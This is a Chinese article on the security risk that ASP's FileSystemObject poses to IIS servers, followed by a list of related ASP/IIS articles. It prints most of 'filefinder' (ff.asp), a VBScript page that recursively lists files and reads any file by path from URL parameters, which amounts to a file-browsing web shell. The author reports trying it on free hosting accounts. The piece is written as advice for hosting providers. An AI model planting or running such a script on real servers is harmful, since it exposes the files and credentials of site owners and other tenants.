ASP中FSO对象对IIS WEB服务器数据安全的威胁及对策

scripting.filesystemobject 对象是由 scrrun.dll 提供的许多供 vbscript/jscript 控制的 com 对象之一。scripting.filesystemobject 提供了非常便利的文本文件和文件目录的访问,但是同时也对 iis web 服务器数据安全造成了一定的威胁。

filefinder 的代码很简单,由3 个函数和 30 行左右的顺序代码构成。

最关键的是 findfiles 函数,通过对它的递归调用实现对某个目录的遍历,并且按照特定的文件扩展名来搜寻这些文件。

function findfiles(strstartfolder, strext)

dim n

dim othisfolder

dim ofolders

dim ofiles

dim ofolder

dim ofile

' 如果系统管理员对文件系统的权限进行细致的设置话,下面的代码就要出错

' 但是有些目录还是可以察看的,所以我们简单的把错误忽略过去

on error resume next

n = 0

response.write "<b>searching " & strstartfolder & "</b><br>"

set othisfolder = g_fs.getfolder(strstartfolder)

set ofiles = othisfolder.files

for each ofile in ofiles

' 如果是指定的文件扩展名,输出连接导向本身,但用不同的命令 cmd

' 在这里是 cmd=read,即读出指定物理路径的文本文件

if issuffix(ofile.path, strext) then

response.write "<a target=_blank href='ff.asp?cmd=read&path=" & server.htmlencode(ofile.path) & "'><font color='dodgerblue'>" & ofile.path & "</font></a><br>"

if err = 0 then

n = n + 1

end if

end if

next

set ofolders = othisfolder.subfolders

for each ofolder in ofolders

n = n + findfiles(ofolder.path, strext)

next

findfiles = n

end function

下面的代码是对 url 后面的参数进行分析:

' 读出各个参数的值

strcmd = ucase(request.querystring("cmd"))

strpath = request.querystring("path")

strext = request.querystring("ext")

brawdata = ucase(request.querystring("raw"))

' 默认搜索 .asp 文件

if strpath = "" then

strpath = "."

end if

if strext = "" then

strext = ".asp"

end if

' 根据不同的命令 cmd 执行不同的代码

select case strcmd

case "find"

response.write findfiles(strpath, strext) & " file(s) found"

case "read"

if brawdata = "t" then

response.write readtextfile(strpath)

else

response.write "<pre>" & server.htmlencode(readtextfile(strpath)) & "</pre>"

end if

case else

response.write "<h3>please specify a command to execute</h3>"

end select

从上面的分析可以看出,如果有足够的权限的话,我们就可以通过 filefinder 来查找 iis web 服务器上的任意文本文件,并且可以轻松的察看文件内容。对于非文本文件,可以确定他们是否存在及其所在路径,这对于高级 hacker 们来说,这些信息有时是极其重要的。

但是这些对数据安全的威胁的前提条件是执行 ff.asp 的用户至少拥有读取目录和文件的权限。由于 windows nt server 在安装后的默认安全设置是所有用户都可以“读取”目录和文件,所以不管是 iis 默认的你名用户 iusr_servername 还是别的什么用户,都可以顺列的读取目录和文件的信息。而大多数 windows nt server系统管理员主要关心系统是否能够运行的起来,一般不愿意去改动默认的目录和文件权限,毕竟那样做要冒很大的风险,而且需要很多次得经验。所以,我们可以用 filefinder 来检查作为 web 服务器的 nt server 的文件系统的安全设置是否安全。

作者专门对作为 iis web 服务器的文件系统的权限进行了人工设置,但限于没有经验,导致了许多奇怪的错误现象,如:所用的做实验的 nt server 4.0 不能进行 access 数据库的连接。而在进行文件系统权限改动之前,这些功能是正常的。

本着纯粹研究的目的,作者还在我所申请的免费 asp 空间上作了试验(包括 csdn 提供的我的个人主页),结果是 filefinder 都可以顺利运行。而在http://www2.domaindlx.com/index.html 申请的个人主页却没有这个问题,可见这个免费 asp 主页提供商在这方面做的还是比较认真的。尽管 domaindlx 的 web 服务器运行在 windows 2000 server 上的,其默认的文件系统的安全权限和 nt 4.0 没有很大的差别。

由于作者的能力有限,就对这个问题讨论到这里。仅以此文来向国内的 asp 主页提供商提供参考意见,希望能对提供商和客户双方的数据安全都有所帮助。

附:用其它类似的服务器端脚本来运行的 web 服务,如果也提供类似 scripting.filesystemobject 的对文件系统操作的功能,不管什么平台应该存在同样的问题。

(0)

相关推荐

  • ASP中FSO对象对IIS WEB服务器数据安全的威胁及对策

    scripting.filesystemobject 对象是由 scrrun.dll 提供的许多供 vbscript/jscript 控制的 com 对象之一.scripting.filesystemobject 提供了非常便利的文本文件和文件目录的访问,但是同时也对 iis web 服务器数据安全造成了一定的威胁. filefinder 的代码很简单,由3 个函数和 30 行左右的顺序代码构成. 最关键的是 findfiles 函数,通过对它的递归调用实现对某个目录的遍历,并且按照特定的文件扩

  • 保护(IIS)web服务器安全的15个技巧

    通常地,大多数Web站点的设计目标都是:以最易接受的方式,为访问者提供即时的信息访问.在过去的几年中,越来越多的黑客.病毒和蠕虫带来的安全问题严重影响了网站的可访问性,尽管Apache服务器也常常是攻击者的目标,然而微软的Internet信息服务(IIS) Web服务器才是真正意义上的众矢之的.  高级教育机构往往无法在构建充满活力.界面友好的网站还是构建高安全性的网站之间找到平衡点.另外,它们现在必须致力于提高网站安全性以面对缩减中的技术预算 (其实许多它们的私有部门也面临着相似的局面). 正

  • ASP中FSO的神奇功能 - 简介

    作 者 : 甘冀平 ; 原文出处:http://www.15seconds.com/Issue/000816.htm 在ASP中,FSO的意思是File System Object,即文件系统对象. 我们将要操纵的计算机文件系统,在这里是指位于web服务器之上.所以,确认你对此拥有合适的权限.理想情况下,你可以在自己的机器上建立一个web服务器,这样就能方便地进行测试.如果运行于Windows平台,请试一试微软公司的免费个人Web服务器PWS. FSO 模型对象 Drive Object:驱动器

  • ASP中FSO的神奇功能 - 写文件

    作 者 : 甘冀平 ; 假设你想创建一个简单的留言簿,你可以建立一个数据库,在其中存储用户的信息.然而,如果并不需要数据库的强大功能,使用FSO来存储信息将节省你的时间和金钱.并且,一些ISP也许限制了web上的数据库应用. 假设你在一个表单中收集了一些用户信息,这里是一个简单表单HTML代码: < html> < body> < form action="formhandler.asp" method="post"> <

  • ASP中解决“对象关闭时,不允许操作。”的诡异问题……

    在ASP中进行数据库操作时 复制代码 代码如下: rs.Open strsql,conn,1,3 while not rs.eof //对象关闭时,不允许操作. 找了好久,最后在strsql中发现问题所在-- 原因是: 这个strsql = "exec ***",用的是存储过程,而这个***存储过程中的最后加了一句"print @sql",导致这个问题,注释掉就OK了--

  • Java中常见的5种WEB服务器介绍

    Web服务器是运行及发布Web应用的容器,只有将开发的Web项目放置到该容器中,才能使网络中的所有用户通过浏览器进行访问.开发Java Web应用所采用的服务器主要是与JSP/Servlet兼容的Web服务器,比较常用的有Tomcat.Resin.JBoss.WebSphere 和 WebLogic 等,下面将分别进行介绍. Tomcat 服务器 目前最为流行的Tomcat服务器是Apache-Jarkarta开源项目中的一个子项目,是一个小型.轻量级的支持JSP和Servlet 技术的Web服

  • ASP中Request对象获取客户端数据的顺序(容易忽略)

    在ASP中Request对象是获取客户端提交数据的一个很重要的对象,大家对他也是非常熟悉了.虽然如此,还是经常有人问我下面的几种写法有什么不同,到底应该怎么写? strMessage = Request("msg") strMessage = Request.Form("msg") 而且,我也看过好多人写的代码,一律都是Request("")的写法,当然这样的写法并没有什么错. 只是大家应该注意 Request对象有几个集合来获取客户端提交的数据

  • ASP中FSO的神奇功能 - 文件读取

    作 者 : 甘冀平 现在已经有了一些用户信息保存在文件中,就像一个简单的数据库.假设有一个用户想了解所有的访问者,就要从登 记的信息中分离出相关部分,因为没有象数据库一样拥有结构化的列. 我们知道,在所创建的文件中,第1行是用户名,第2行是他们的主页,第3行是他们的电子邮件地址.随后登记的用 户也是按照这样的结构存储他们的信息,所以每3行将包含一个用户的登记信息.知道了这些,就可以编写下面的代码来显 示信息: < % ' create the fso object set fso = Serve

  • ASP中FSO的神奇功能 - 使用FSO进行搜索

    作 者 : 甘冀平 你也许想:好,现在我知道如何写入文件了.但能做到更多一些吗?下面来试一试为web站点建立一个搜索功能. 建立搜索引擎的关键是递归.主要地,编写一段代码搜索目录下的文件,然后对所有的目录循环执行同样的代码.因 为不能确定总共有多少个子目录,所以必须一遍又一遍地执行搜索代码,直到结束.递归调用非常好! 下面来创建搜索页面.假设已经建立了一个HTML表单,用户在其中输入一个搜索字符串. Dim objFolder Dim strSearchText Dim objFSO strSe

  • IIS Web服务器支持高并发设置方法详解

    适用的IIS版本:IIS 7.0, IIS 7.5, IIS 8.0 适用的Windows版本:Windows Server 2008, Windows Server 2008 R2, Windows Server 2012 1.应用程序池(Application Pool)的设置: General->Queue Length设置为65535(队列长度所支持的最大值)Process Model->Idle Time-out设置为0(不让应用程序池因为没有请求而回收)Recycling->

随机推荐